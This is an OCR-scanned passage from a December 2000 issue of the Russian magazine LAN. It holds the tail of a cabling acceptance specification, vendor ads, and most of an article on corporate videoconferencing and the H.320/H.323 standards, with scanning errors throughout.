щейся в памяти информации с тес-
тера в персональный компьютер тес-
товое оборудование должно иметь
последовательный порт.
i) При оптическом измерении длины
волокна следует использовать метод,
основанный на времени пролета.
j) Для увеличения эффективности из-
мерений рекомендуется использо-
вать тестовое оборудование, способ-
ное производить измерения для во-
локонной пары Tx/Rx одновременно,
к) Для двунаправленного тестирова-
ния рекомендуется использовать те-
стовое оборудование с двойной
функциональностью у основного и
удаленного блоков, что устраняет
необходимость в «перестановке» оп-
тического источника и измерителя
мощности.
ПРИЕМКА
1. Приемка
По завершении всех работ и предос-
тавления тестовой документации
Заказчик должен подтвердить, что
работа выполнена в соответствии с
контрактом, и в письменной форме
уведомить Подрядчика о формаль-
ной приемке системы.
2. Приемочные требования
а) Подрядчик должен дать письмен-
ную гаран тию того, что инсталляция
на юо% соответствует требованиям,
указанным в разделе «Соответствие
стандартам и тестовые требования».
Ь) Заказчик оставляет за собой право
выполнить повторное произвольное
тестирование до 5% кабельной сис-
темы, используя оборудование и ра-
бочую силу Подрядчика с целью
проверки документированных ре-
зультатов. Любая не функциониру-
ющая часть кабельной системы под-
лежит повторному тестированию и
приведению в рабочее состояние.
Если повторным тестированием ус-
тановлено несоответствие требова-
ниям более 2% кабельной системы,
то вся кабельная система тестирует-
ся повторно и приводится в рабочее
состояние без дополнительных за-
трат со стороны Заказчика.
с) Приемка должна происходить по
завершении всей работы, успешного
тестирования после инсталляции (т.
е. результатом всех тестов должна
быть оценка «прошел») и получения
всей документации, как указано в
Разделе 4.
3. Гарантии
Подрядчик должен дать гарантии на
период в 15 лет на отсутствие у про-
дукции дефектов, а также удостове-
рить, ч то все одобренные компонен-
ты кабельной системы соответству-
ют или превышают требования дан-
ного документа. LAN
Марк Джонстон директор отдела по
технологическому развитию компании
Microtest. С ним мож но связаться через
его сайт http://www.cabling.com.
качественное
оборудование
качественная
инсталляция
качественная
кабельная
система
Более 30 лет Ortronics объединяет
технические знания с накопленным опытом,
Ortronics обеспечивает своих клиентов
наиболее передовой 25-летней гарантийной
программой сопровождения кабельных систем.
чтобы быть лидером на глобальном рынке.
Сегодня многие известные мировые и российские
компании предпочитают использовать оборудование
и решения Ortronics в своих кабельных системах.
® ORTRONICS
www.ortronics.com (095) 787 2754
Сегодня Ortronics предлагает широкий ряд
высокопроизводительных, уникальных, простых
в инсталляции решений для кабельных систем.
Весь спектр продукции Ortronics, от решений класса
SOHO до больших кампусных и телекоммуникационных
систем, производится на современных заводах,
сертифицированных по ISO-9001.
НАШИ ДИСТРИБУТОРЫ И ПАРТНЕРЫ ВСЕГДА НАХОДЯТСЯ РЯДОМ С ВАМИ
Сонет Текнолоджмс Москва (0951277 1166 БИСлтд. Ростов-на-Дону (8632)64 50 46 Алыстел Алматы (32721608 576
Риал Системе Москва (095)798 3000 Найтов Ташкент (988 71)132 1780 Сонет Киев Киев (044)4504072
> http://wwv7.lanmag.ru
Декабрь 2000 73
>СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
Видеоконференции
находят реальное применение
в корпоративных сетях. Александр Авдуевский
Лицом к лицу
Резиновый Полыхаев ни в чем
не уступал Полыхаеву живому.
И. Ильф, Е. Петров, «Золотой теленок»
В лексиконе специалистов, когда
речь заходит о корпоративных ре-
шениях, словосочетания «сеть пе-
редачи данных» или «компьютерная
сеть» встречаются все реже. Конверген-
ция различных видов трафика стирает
различия сетей «по принадлежности»,
и, как следствие, соответствующая лек-
сика выходит из употребления. Однако
процесс конвергенции идет в целом дос-
таточно неспешно. Это происходит по
самым различным причинам. Одна из
них состоит в том, что некоторые воз-
можное™ представляются потенциаль-
ным пользователям явным излишест-
вом. В первую очередь данное утвержде-
ние можно отнести к передаче видео.
Несмотря на то что оборудование для
видеоконференций появилось в нашей
стране относительно давно (на выстав-
ках оно демонстрируется уже лет пять),
многие считали и продолжают считать
его занятной дорогостоящей игрушкой.
И действительно, хотя до сих пор реше-
ния для видеоконференций нередко
включаются в масштабные проекты в
качестве дополнительной «приманки»
для начальства (так как именно от него
зависит решение о выделении средств),
тем не менее стадию интересного, но ма-
лополезного курьеза они уже переросли.
НЕ ИГРУШКА
Ничто так не убеждает в пользе того или
иного решения, как конкретные приме-
ры из реальной жизни. В нашей ежеме-
сячной рубрике «Поучительный при-
мер», в материалах «Места для куря-
щих» (июньский номер LAN за 1998 г.) и
«Камера смотрит в мир» (мартовский
номер LAN за 2000 г.) уже рассматрива-
лись реальные сетевые проекты, где с
использовались видеоконференции.
Поскольку, вероятно, не все наши чита-
тели имеют возможность обратиться к
подшивке LAN или оперативно оты-
скать нужные материалы в нашем архи-
ве на Web-сайте журнала, вкратце рас-
скажем, о чем в них шла речь.
Первый материал был посвящен кор-
поративной сети российского отделения
концерна RJR (торговые марки Marlboro
74 LAN/Журнал сетевых решений
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
и Camel). Конечно, систему видеоконфе-
ренций (в данном случае PictureTel но
каналам ISDN) нельзя назвать жизнен-
но важной для RJ R, но используется она
тем не менее весьма активно. Головной
офис российского отделения RJR нахо-
дится в Москве; не последнее место в де-
ятельности концерна занимает также
офис в Санкт-Петербурге (в этом городе
находится производство, выпускающее
такие сигареты, как «Петр 1»). Система
видеоконференций используется для
организации регулярных совместных
оперативных совещаний руководства
обоих офисов. В данном случае видео-
конференц-связь избавляет весьма заня-
тых людей от регулярных поездок меж-
ду двумя столицами, а также делает со-
вещания по-настоящему оперативными.
Несмотря на то что RJR — компания за-
падная, бизнес она все же ведет в России,
и экономические соображения диктуют-
ся именно нашими условиями. К тому
же отечественных организаций, деятель-
ность которых также строится вокруг
двух-трех ключевых офисов (каждый из
которых отвечает за солидную долю биз-
неса) в различных городах, найдется на-
верняка немало.
Во втором материале в центре пове-
ствования находятся непосредственно
видеоконференции. Этот выпуск рубри-
ки посвящен тому, как видеоконференц-
связь помогает одновременно соблюсти
конституционные права граждан и ре-
шить связанные с этим сложные органи-
зационные вопросы. Приблизительно в
конце прошлого года Конституционный
суд РФ закрепил за осужденными право
лично присутствовать на заседаниях су-
да второй (и выше) инстанции во время
рассмотрения кассационных жалоб (ра-
нее такая возможность предоставлялась
только по усмотрению суда). Однако ре-
ализовать это конституционное право
не так-то просто, поскольку, во-первых,
осужденные к моменту рассмотрения
жалобы могут уже находиться в местах
заключения, а организовать их доставку
в зал суда достаточно сложно. Во-вто-
рых, сами суды не рассчитаны на вре-
менное содержание осужденных, тем
более в значительных количествах. Че-
лябинский городской суд провел успеш-
ный эксперимент по виртуальному при-
сутствию осужденных в зале суда (по их
желанию). Между зданием суда и СИ-
ЗО были организованы каналы связи
Шлюз Терминал Привратник Терминал
Терминал Терминал
Терминал
MCU
Архитектура систем на базе Н.323.
(по протоколу IP), поверх которых была
реализована (на постоянной основе) ви-
деоконференц-связь. Члены суда высту-
пали в роли режиссеров видеоконфе-
ренций, направляя камеру на тех, кому в
зале предоставлялось слово. В результа-
те эффективность работы суда заметно
повысилась, а кроме того, была частич-
но снята проблема доставки и содержа-
ния осужденных (желающие лично при-
сутствовать, естественно, остаются).
Эти два примера наглядно демонст-
рируют основные области применения
видеоконференций. Первый пример
можно считать классическим для видео-
конференций. Конечно, намереваясь
применять видеоконференц-связь та-
ким образом, заказчику следует оценить
экономическую отдачу от решения. Со-
вокупная стоимость владения системой
(начальные расходы, стоимость каналов
и поддержки) должна быть, разумеется,
такова, чтобы сэкономленные на переез-
дах ресурсы обеспечивали окупаемость
за короткий срок. Если, например, пла-
нерки проводятся в начале каждой неде-
ли, то выгоды от использования реше-
ний для видеоконференций становятся
вполне очевидными, особенно когда с
каждой стороны в совещаниях участву-
ют группы людей. Если же совещания
достаточно редки, предварительную
оценку требуется провести более тща-
тельно. При этом следует учитывать гот
факт, что, когда поездки становятся не
столь обременительными, сотрудник
может предпочесть присутствовать на
совещании, особенно если на месте он
имеет возможность решить дополни-
тельно какие-то другие вопросы в инди-
видуальном порядке. С другой стороны,
определенную роль может сыграть и
возможность оперативно свести лицом
клипу, хотя бы и виртуально, всех необ-
ходимых для решения какого-либо воп-
роса людей. Вполне естественно, что в
этом случае возникает вопрос, а не будет
ли во всех отношениях проще организо-
вать телеконференции (в номенклатур-
ной терминологии — селекторное сове-
щание)? Здесь вряд ли можно безогово-
рочно высказаться в пользу того или
иного решения. В этой связи можно
привести одно наблюдение из жизни.
Несмотря на то что в современном офи-
се каждый сотрудник доступен по «ме-
стному» телефону, люди часто предпо-
читают не звонить по какому-либо воп-
росу, а задать его лично (если, конечно,
это необременительно). Личное обще-
ние заметно повышает продуктивность
любого обсуждения или дискуссии, и
данный фактор необходимо учитывать.
Второй пример, конечно, нельзя обоб-
щенно транслировать на какую-то дру-
гую, кроме описанной, ситуацию. Одна-
ко он достаточно выпукло иллюстрирует
еще одну нишу применения видеокон-
ференций. Это ситуации, когда требует-
ся личное присутствие человека, но оно
по каким-то причинам затруднительно
или просто невозможно. Одна из облас-
тей применения видеоконференций —
телемедицина. (Собственно, и предыду-
щее «бизнес-приложение» также частич-
но попадает в данную нишу.) Рассмот-
ренный пример создаст один очень важ-
ный прецедент, поскольку суду при-
шлось определить некоторую юридиче-
скую базу, для приравнивания виртуаль-
ного участия осужденного в заседании к
личному. Поскольку, например, для то-
го, чтобы видеоматериалы были призна-
ны свидетельством, требуется соблюде-
ние массы юридических формальностей,
виртуальное присутствие следует огова-
> http://www.lanmag.ru
Декабрь 2000 75
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
ривать особо. В данном случае это не вы-
звало особых проблем. Почему это об-
стоятельство столь важно? Например,
видеоконференции могут упростить
процедуру организации собрания акцио-
неров какого-либо предприятия. Но учи-
тывая тот факт, что легитимность обыч-
ных собрании часто ставится под вопро-
сом, признание, скажем, кворума будет
задачей непростой. Тем не менее нали-
чие прецедента, причем в такой весьма
строго регулируемой нормами области,
как правосудие, свидетельствует о том,
что юридические барьеры преодолимы.
Несмотря на то что видеоконферен-
ции нужны конечным пользователям, а
точнее, корпоративным заказчикам
(«любительские» решения для частного
общения в Internet не в счет), это не зна-
чит, что они должны обязательно быть
владельцами соответствующего обору-
дования. В тех случаях, когда видеокон-
ференции требуется проводить нс чаще,
чем раз или два в год, заказчику выгод-
нее пользоваться видеоконференц-свя-
зью временно, не делая «капитальных»
инвестиций. Естественно, «одолжить»
решение можно либо у интегратора,
способного развернуть систему видео-
конференц-связи па временной основе,
либо, еще лучше, у оператора.
Перед опера торами и сервис-провай-
дера.ми действительно открывается ин-
тересное поле деятельности. Уже давно
операторы предлагают такую услугу,
как организация телеконференций, в
том числе и международных, когда уча-
стники, где бы они не находились, зво-
нят па определенный номер (возможно,
с некоторым расширением) и подклю-
чаются к конференции. (Автор, равно
как и его коллеги из других изданий, в
свое время имел возможность восполь-
зоваться этой услугой для виртуально-
го участия в пресс-конференции по по-
воду приобретения Cabletron сетевого
бизнеса DEC.) Разумеется, организо-
вать телеконференцию намного проще,
поскольку заказчик уже имеет как не-
обходимое конечное оборудование (те-
лефон), так и каналы связи (обычный
выход в городскую - а затем, возможно,
междугородную или международную
телефонную сеть). Но, с другой сторо-
ны, каналы передачи данных или как
минимум выход в Internet есть, как го-
ворится, «у всех приличных людей» (по
крайней мере, в организациях, где на-
зрела потребность в видеоконференц-
связи, они уже должны быть), а предос-
тавление на время нужного оборудова-
ния при, очевидно, не самом массовом
спросе на услугу тоже не должно вызы-
вать особых затруднений.
Сегодня услуга видеоконференц-свя-
зи не является в России типовой для опе-
ратора. Подобные сервисы уже предоста-
влялись и предоставляются, но пока
лишь от случая к случая, а не системати-
чески (нередко это демонстрация техни-
ческих возможностей явно с маркетинго-
выми целями). Если попытаться оценить
перспективы развития данного направ-
ления в операторском бизнесе, то они
представляются весьма многообещаю-
щими по ряду соображений. Во-первых,
идея аутсорсинга и ASP становится все
более популярной нс только на Западе,
76 LAN/Журнал сетевых решений
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
но и у нас дает свои ростки. Во-вторых,
конкуренция на рынке телекоммуника-
ционных услуг постепенно обостряется.
Так называемый «официальный теле-
ком» уже начинает ощущать не самые
благоприятные для себя последствия ак-
тивной деятельности независимых опе-
раторов, а это значит, что и конкуренция
между ними достаточно высока. Пос-
кольку пределы снижения цены для при-
влечения клиентов ограничены, очевид-
но, основным средством борьбы за него
становится предложение новых серви-
сов. Несмотря на то что в нашей стране
телекоммуникационная инфраструктура
развита нс так хорошо, как хотелось бы,
сети с «излишками» пропускной способ-
ности все же имеются, а продать их тем
легче, чем больше предлагается сервисов.
Услуга организации видеоконферен-
ций вполне укладывается в названные
тенденции, и можно ожидать, что по ме-
ре того, как рынок решений для видео-
конференц-связи станет расширяться (в
первую очередь в области приложений),
в этом направлении будет вестись доста-
точно активная работа. Во всяком слу-
чае необходимый технический опыт у
большинства операторов есть. Теперь
все, что требуется, это благоприятная
рыночная конъюнктура.
ДЕЛО ТЕХНИКИ
Говоря о видеоконференциях, нельзя не
уделить внимания лежащим в их осно-
ве технологиям и основным элементам
систем видеоконференц-связи. Техно-
логическую базу видеоконференций со-
ставляют сегодня стандарты ITU-T
[I.J2X. Стандарты их обиходное на-
звание, правильнее было бы называть
эти документы рекомендациями. Во-
первых, практически все они имеют
именно такой официальный статус, а
во-вторых, степень жесткости предъяв-
ляемых в них требований, о чем в даль-
нейшем пойдет речь, невысока. Но для
простоты мы будем и далее называть
эти документы стандартами.
Н.32Х — это так называемые «зон-
тичные» стандарты, поскольку каждый
из них объединяет в себе несколько от-
дельных спецификаций различного на-
значения. Функционально эти группы
стандартов отвечают за компрессию,
передачу звука, видео и данных, сигна-
лизацию (а также управление сеансом),
мультиплексирование и поддержку се-
Рисунок 2. Шлюз позволяет интегрировать Н.320 и Н.323.
ансов с более чем двумя участниками
(multipoint). В Таблице 1 приведены
стандарты Н.32Х с соответствующими
подстандартами. В глаза бросается их
очевидное сходство, объясняющееся
тем, что в той или иной степени все они
базируются на положениях Н.320, адап-
тированных и расширенных в соответ-
ствии со средой передачи.
Стоит отметить, что наибольшую до-
лю рынка занимают решения на основе
Н.320 и Н.323. Это неудивительно, по-
скольку, например, ATM как па рабочих
местах, так и на «последней миле» ис-
пользуется редко (хотя благодаря под-
держке качество обслуживания ATM —
самая предпочтительная среда для ви-
САМЫЙ ЯРКИЙ! САМЫЙ ЛЁГКИЙ!
официальный дистрибьюторзм
I Приглашаем
I I Ж. к сотрудничеству
офисные системы дилеров
оборудование для обучения и презентаций
деоконференций), а повышение пропу-
скной способности на «последней миле»
и развитие ISDN во всем мире снижает
необходимость в поддержке прямой пе-
редачи по низкоскоростным линиям
(Н.324). Таким образом, мы в дальней-
шем будем говорить о системах, поддер-
живающих стандарты Н.320 и Н.323.
Хотя решения на основе Н.320 име-
ют приличный послужной список, даже
беглый взгляд на маркетинговые мате-
риалы большинства производителей
показывает, что будущее своего бизнеса
они связывают с Н.323. В этом нет абсо-
лютно ничего удивительного, посколь-
ку IP сегодня — самая популярная сре-
да передачи «всего на свете», и несмот-
(812) 310-0384
(812) 310-6564
(812) 310-5029
E-mail: btk@btk.com.ru
Http: И w ww. btk.com.ru
> http://www.lanmag.ru
Декабрь 2000 77
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
ISDN (Н.320) Ethernet (Н.323) ТфОП (Н.324) ATM (Н.321) Iso-Ethernet (Н.322)
Видео Н.261 Н.261 Н.263 Н.261 Н.263 Н.261 Н.261
Аудио G.711 G.722 G.728 G.711 G.722 G.728 G.729 G.728 G.723 G.711 G.728 G.711 G.722 G.723 G.728
Данные Т.120 Т.120 Т.120 Т.434 Т.434 Т.120 Т.120
Мультиплексирование Н.221 Н.225 Н.223 Н.221 Н.221
Сигнализация Н.230 Н.242 Н.230 Н.242 Н.245 Н.230 Н.242 Н.230 Н.242
Групповая конференция Н.243 — Н.243 Н.243
Таблица 1. Основные стандарты ITU-T для видеоконференций.
ря на трудности с реализацией качества
обслуживания отрасль неуклонно дви-
жется в выбранном направлении. Пре-
восходство сетей IP перед ISDN обу-
словлено общими преимуществами ре-
шений с коммутацией пакетов перед ва-
риантами с коммутацией каналов. В ча-
стности, пакетный подход не привязан
к конкретному типу каналов (IP может
работать поверх чего угодно, в том чис-
ле и ISDN). Это позволяет гибко выби-
рать те или иные телекоммуникацион-
ные решения, исходя из общих потреб-
ностей, а также при необходимости без
проблем менять оператора или провай-
дера. Что особенно важно в наших усло-
виях — нет надобности организовывать
каналы ISDN между всеми точками, а
данная задача в России не всегда вы-
полнима (и экономически это тоже мо-
жет быть невыгодно), особенно при
большой географической удаленности.
Это, однако, не означает, что решени-
ям на базе Н.320 суждено исчезнуть.
ISDN, по-прежнему, — достаточно рас-
пространенная телекоммуникационная
услуга (в России также есть некоторый
рынок ISDN), к тому же гарантии каче-
ства обслуживания в ISDN (что естест-
венно для выделенных соединений) -
весьма веский аргумент в пользу Н.320.
Учитывая то, что благодаря «родству»
между этими двумя стандартами прин-
ципиальных проблем с организацией
шлюза между системами не существует,
нет и серьезных причин для замены име-
ющихся систем. Н.323 будет доминиро-
вать, но Н.320 суждено просуществовать
еще достаточно долго (даже с учетом
темпов развития современных техноло-
гий). Более того, в линиях продуктов не-
которых производителей, которые с эн-
тузиазмом предсказывают неизбежный
переход к пакетной передаче, самые
мощные продукты поддерживают пока
что только Н.320. И в этом нет ничего
удивительного, ибо уровень решения оп-
ределяется прежде всего качеством пере-
дачи, а здесь, повторимся, преимущество
пока что за решениями на базе ISDN.
Поскольку идейно Н.323 и Н.320
близки, и будущее, как утверждается,
принадлежит именно первому стандар-
ту, в дальнейшем мы будем говорить
преимущественно о нем, отмечая только
принципиальные отличия между ними.
В системах на базе протокола Н.323
можно выделить несколько основных
элементов. Оконечное оборудование
(endpoint) — это устройство, принима-
ющее или передающее потоки пакетов.
Частным случаем оконечного оборудо-
вания является терминал, который мо-
жет быть связан с любым другим эле-
ментом архитектуры Н.323. Задача тер-
минала - организовать прием и переда-
чу контрольной, а также аудио, видео и
данных в любой комбинации. (В прин-
ципе, сам стандарт не ориентирован
именно на видео, его «аудиочасть» с ус-
пехом используется в решениях IP-те-
лефонии.) Шлюз — оконечное устрой-
ство, обеспечивающее двусторонний об-
мен в режиме реального времени между
терминалами II.323 и другими шлюзами
или оконечными устройствами, в том
числе и в сетях с передачей пакетов. На-
пример, задачей шлюза может быть ин-
теграция с системами на базе стандарта
Н.320. Технически интеграция решений,
основанных на двух протоколах, сводит-
ся к трансформации единого битового
потока Н.320 со скоростью передачи,
как у канала ISDN (№64 Кбит/с), в не-
зависимые потоки пакетов, где содер-
жится информация различных типов.
Естественно, шлюзом решается и обрат-
ная задача. В данном случае он также
выполняет роль синхронизатора скоро-
стей передачи и преобразователя ком-
муникационных протоколов.
Устройство управления «многополь-
зовательской конференцией» (Multi-
point Control Unit, MCU) — это оконеч-
ное устройство, позволяющее организо-
вать одновременные сеансы между не-
сколькими терминалами сразу. В состав
MCU как обязательный элемент вклю-
чен контроллер (МС), непосредственно
отвечающий за организацию сеансов, а
также может входить процессор (МР),
обрабатывающий потоки видео, аудио и
данных (зачем нужна такая функцио-
нальность, будет видно в дальнейшем).
Наконец, привратник (gatekeeper) регу-
лирует доступ терминалов, шлюзов и
MCU друг к другу, а также может брать
на себя дополнительные функции, та-
кие, как управление пропускной способ-
ностью или выбор каналов связи. Нали-
чие привратника позволяет оптимизиро-
вать работу системы, а также решить во-
просы контроля доступа к ней. Шлюзы и
привратники — основное отличие архи-
тектуры систем на базе Н.323 от систем
па базе Н.320. Н.323 позволяет реализо-
вывать более гибкую топологию систе-
мы и эффективнее использовать се ре-
сурсы, в частности ресурсы MCU (если в
системе несколько подобных уст-
ройств). Заметим, однако, что это преи-
мущество становится решающим, когда
предполагается массовое использование
видеоконференц-связи — как стандарт-
ного средства коммуникаций в корпора-
тивной среде либо как стандартной ус-
луги оператора. В ситуациях, когда сис-
тема должна объединять небольшое ко-
78 LAN/Журнал сетевых решений
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
личество терминалов, выбор типа реше-
ния определяется только соображения-
ми качества и тем, насколько выгоднее
или удобнее арендовать тот или иной
тип каналов. Стоит также учесть, что
смешанная платформа может оказаться
удобнее для применения. Например, ви-
доизменив ситуацию, рассмотренную в
первом примере из практики, мы можем
представить, что в еженедельных пла-
нерках должны участвовать еще и пред-
ставители региональных офисов. Оче-
видно, организовывать каналы ISDN с
регионами — не лучший вариант, поэто-
му «штучные» участники видеоконфе-
ренции будут использовать решения на
основе Н.323, выходя на шлюз, который
по совместительству может выполня ть и
роль MCU.
Теперь настала пора поговорить о ре-
жимах видеоконференций. Самый про-
стой вариант, очевидно, — «точка-точ-
ка». В этом случае два терминала само-
стоятельно устанавливают между собой
связь и начинают передачу. Отличие ме-
жду Н.320 и Н.323 заключается в данном
случае в том, ч то при установлении свя-
зи терминалы Н.323 предварительно сог-
ласовывают скорости передачи. Прини-
мающая сторона устанавливает лимит,
определяемый ее возможностями, а пе-
редающая сторона осуществляет переда-
чу со скоростью, не превышающей уста-
новленный предел. Очевидно, что пре-
дел определяется как классом оборудо-
вания, так и используемым им каналом.
В случае конференции с несколькими
участниками возможно несколько вари-
антов. П.320 поддерживает -единствен-
ный вариант — централизованную рабо-
ту нескольких терминалов (Н.323 также
поддерживает аналогичный режим). При
этом терминалы работают через MCU, т.
с. каждый терминал имеет только один
канал связи (в случае ISDN организовать
взаимодействие по-другому было бы бо-
лее чем затруднительно). Если говорить
об Н.323, то на MCU также ложится зада-
ча согласования скорости передачи с тер-
миналами. Когда в состав MCU входит
процессор (МР), потоки, как мы уже от-
мечали, могут подвергаться дополни-
тельной обработке в целях упрощения
работы терминалов (разгрузки их про-
цессоров) и повышения качества переда-
чи. В частности, МР может микшировать
все потоки видео, аудио и данных, упоря-
дочивая их подачу на терминалы.
Н.323 поддерживает также децентра-
лизованный подход, когда более двух
терминалов работают в режиме конфе-
ренции, не используя MCU. В таком ре-
жиме с увеличением числа терминалов,
количество перекрестных связей воз-
растает в прогрессии. При трех терми-
налах количество требуемых каналов
будет соответствовать варианту с MCU;
если же терминалов будет четыре - ка-
налов уже станет в полтора раза боль-
ше, если пять — в два раза и т. д. Собст-
венно, увеличения требуемой пропуск-
ной способности вдвое уже достаточно,
чтобы возникли проблемы.
Поскольку в случае Н.323 режим кон-
ференции предполагает передачу одина-
ковых потоков пакетов на несколько ад-
ресов, использование механизмов мно-
гоадресной рассылки может снизить
трафик в сети как при централизован-
ном, гак и децен трализованном подходе.
Вообще, применение средств поддержки
мультимедийного трафика в сетях IP
может в целом решить вопросы пропуск-
ной способности и обеспечения качест-
ва. Проблема только в том, что многоад-
ресная рассылка, RSVP, RTCP пока что
не поддерживаются достаточно широко,
особенно в общедоступных сетях. Одна-
ко на уровне локальных сетей этот воп-
рос можно решить самостоятельно.
В конце раздела следует затронуть
вопросы совместимости. Выше мы не
Certified
Вниманию
системных
\ администраторов!
Хотите знать всё о своей сети? [да/нет]...
ИнфраМенеджер
управление сетевой инфраструктурой
Новая версия - новые возможности для администратора:
- Соответствие стандарту
администрирования кабельных систем (СКС)
- Интеграция с Microsoft Visio 2000 и Microsoft SMS 2.0
- Расширенные конфигурации
сетевых устройств и компьютеров
- Импорт информации из справочников
и средств инвентаризации
СофтИнтегро.
Связывая компьютеры, мы объединяем людей!
www.softintegro.ru tel: (095) 273.27.67 mail@softintegro.ru
случайно отметили, что Н.32Х — это ре-
комендации ITU-T, а не жесткие стан-
дарты. Как рекомендации, они требуют
от производителей обеспечения совмес-
тимости только па базовом уровне, га-
рантирующем возможность организа-
ции сеанса связи между системами раз-
личных производителей. При этом про-
изводители должны обеспечить под-
держку только минимального качества
передачи, что достигается вполне опре-
деленными методами; все остальное ос-
тавляется на усмотрение разработчиков.
В определенном смысле — это непоря-
док, так как потребность в организации
видеоконференций на смешанных плат-
формах вполне реальна. Но в такой по-
литике ITU-T есть свой резон (не стоит
забывать, что в соответствующих рабо-
чих группах и комитетах 1TU-T работа-
ют представители производителей).
Любые вопросы обеспечения качества
при передаче в реальном времени голоса
и видео в пакетных сетях и, в особенно-
сти, в общедоступных сетях IP, как по-
казывает практика, решаются достаточ-
но непросто, а идеального (стандартно-
го) решения нет до сих пор. Рекоменда-
тельный характер стандартов Н.32Х ос-
тавляет производителям достаточно
пространства для внедрения собствен-
ных технологий. Конкуренция же, в
свою очередь, заставляет решать вопро-
сы обеспечения качества, а также вне-
> http://www.lanmag.ru
Декабрь 2000 79
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
дрения дополнительной функциональ-
ности. Впрочем, такая ситуация харак-
терна для сетевой и телекоммуникаци-
онной отраслей в целом — если решение
предполагается использовать, что назы-
вается, в частном порядке (в особенно-
сти в корпоративной среде), то произво-
дители охотно предлагают помимо под-
держки стандартов и свои собственные
«закрытые» решения. Пока применение
видеоконференций не будет носить мас-
сового характера, такая ситуация с сов-
местимостью сохранится. Впрочем, это
не значит, что взаимодействие между
двумя системами различных произво-
дителей может осуществляться только
при минимальном качестве. Может
статься, что на каких-то уровнях ими
поддерживаются одинаковые кодеки и
т. п„ но, разумеется, данный вопрос тре-
бует отдельного выяснения.
ВСЕХ КАЛИБРОВ
Технологии и протоколы хороши не са-
ми по себе, а когда они воплощены в
конкретных решениях. Предлагаемые
на рынке решения можно (с достаточ-
ной степенью условности) классифици-
ровать как персональные, групповые и
так называемые «комнатные» (room).
Персональные системы, как следует из
их названия, рассчитаны на то, что тер-
миналом пользуется один человек, а
кроме того, их предполагается задейст-
вовать для сеансов «точка-точка». Сис-
темы для групповой видеоконференц-
связи также ориентированы па одно-
пользовательские терминалы, и их от-
личие от персональных заключается,
главным образом, в программном обес-
печении. Комнатные системы, как мож-
но судить по названию, предназначены
для обслуживания залов совещаний.
Это оборудование видеоконференций
старшего класса, стоимость которого со-
ставляет десятки или даже сотни тысяч
долларов (или даже больше). Разумеет-
ся, все виды оборудования при условии
достаточной совместимости должны ус-
пешно друг с другом взаимодействовать
(по крайней мере, это так, если оно вы-
пущено одним производителем).
Вне зависимости от того, к какому
классу принадлежит решение, его основ-
ным параметром является качество. В
том, что касается передачи и приема, все
определяется используемыми кодеками
и протоколами, а они, как известно, стан-
дартные. Поэтому не последнюю роль
здесь играют конечное оборудование и
дополнительные средства обеспечения
качества. В «дорогих» системах исполь-
зуются камеры и микрофоны намного
более высокого уровня, чем в персональ-
ных. В частности, возможности настрой-
ки и фокусировки у камер в комнат ных
системах намного выше, чем у камер в
настольных системах (где камеры могут
иметь фиксированную настройку, опти-
мизированную для показа человека, си-
дящего перед компьютером). Если воз-
можности управления в настольных сис-
темах сводятся обычно к стандартному
довольно ограниченному набору PZT
(pan-zoom-tilt, т. е. поворотам и накло-
нам объектива, а также степенью увели-
чения), то у комнатных систем они су-
щественно шире, плюс предусмотрена
поддержка предустановленных положе-
ний, которые камера принимает при по-
лучении системой соответствующей ко-
манды. Возвращаясь к примерам из пра-
ктики, в суде — это фокус на судьях, ад-
вокате, прокуроре и месте свидетеля.
Немаловажное значение имеет так-
же обработка видео и звука. Например,
в комнатных системах реализуются до-
вольно сложные алгоритмы адаптации
к реальным условиям такие, как авто-
матическая регулировка уровня «запи-
си» звука и фильтрация посторонних
шумов. Многое также зависит от того,
как реализованы механизмы минимиза-
ции видеотрафика. Дело в том, что в си-
стемах видеоконференций, особенно в
условиях достаточно ограниченной
пропускной способности, учитывается
тот факт, что характер передаваемого
ими изображения отличается, скажем,
от видеофильма. Во время конферен-
ций демонстрируются обычно лица (ес-
ли речь идет о настольной системе) или
группы сидящих в более-менее статич-
ных позах людей. В таких условиях нет
необходимости передавать всю картину
в целом — достаточно пересылат ь лишь
изменения по отношению к предыду-
щим кадрам. Это позволяет существен-
но экономить пропускную способность
дополнительно к компрессии изобра-
жения. Интеллектуальность отбора ин-
формации для передачи (что зависит
опять-таки от сложности алгоритма)
определяет, насколько плавными и ес-
тественными выглядят изменения изо-
бражения на экране принимающего
терминала. В рекламе систем старшего
класса производители обычно кроме
стандартных параметров (таких, как ча-
стота кадров, разрешение и т. п.) указы-
вают, что мимика и жестикуляция пере-
даются без искажений. От интеллекту-
альности алгоритма обработки видео
зависит также то, насколько адекватно
система адаптируется к резким измене-
ниям изображения (например, спокой-
но сидевший до этого человек может
внезапно нагнуться за оброненной руч-
кой). Если, например, в системах низко-
го уровня во время сеанса начать быст-
ро махать рукой перед камерой, то с
большой степенью вероятности видео и
звук окажутся рассинхронизированы
или появятся «рваные» задержки в пе-
редаче. Кстати, то, насколько плавно
камера переходит в новое положение,
тоже влияет на качество передачи.
Наконец, у систем старшего класса
часто имеется такая «продвинутая»
функция, как место видеорежиссера.
Это место может быть управляющей
консолью или представлять собой сен-
сорный планшет. В функции режиссера
входит управление камерой (или каме-
рами), переключение между различны-
ми источниками изображения, включе-
ние в общую картину кадров с лицами
удаленных выступающих — набор
функций иногда приближается к воз-
можностям небольшой телестудии.
Не стоит забывать о том, что техни-
чески возможности видеоконференц-
связи, особенно работающей по сети IP,
не ограничиваются только передачей
«картинки» с видеокамер. С таким же
успехом можно передавать любую дру-
гую графическую информацию, напри-
мер то, что происходит на мониторе
компьютера, на котором установлена
система видеоконференций. Соответст-
венно, при проведении виртуального
совещания докладчики получают воз-
можность демонстрировать презента-
ции или какие-то другие документы од-
новременно всем участникам, где бы
они ни находились. Такие функции, ра-
зумеется, либо находятся «по ту сторо-
ну» протоколов видеоконференц-связи,
либо являются надстройками над ними,
особенно если речь идет о более про-
двинутых возможностях, таких, напри-
мер, как так называемая «общая гри-
фельная доска» (shared whiteboard —
средство, в том или ином виде реализу-
80 LAN/Журнал сетевых решений
> СТРАТЕГИЯ: ВИДЕОКОНФЕРЕНЦИИ
емое во многих программах общения но
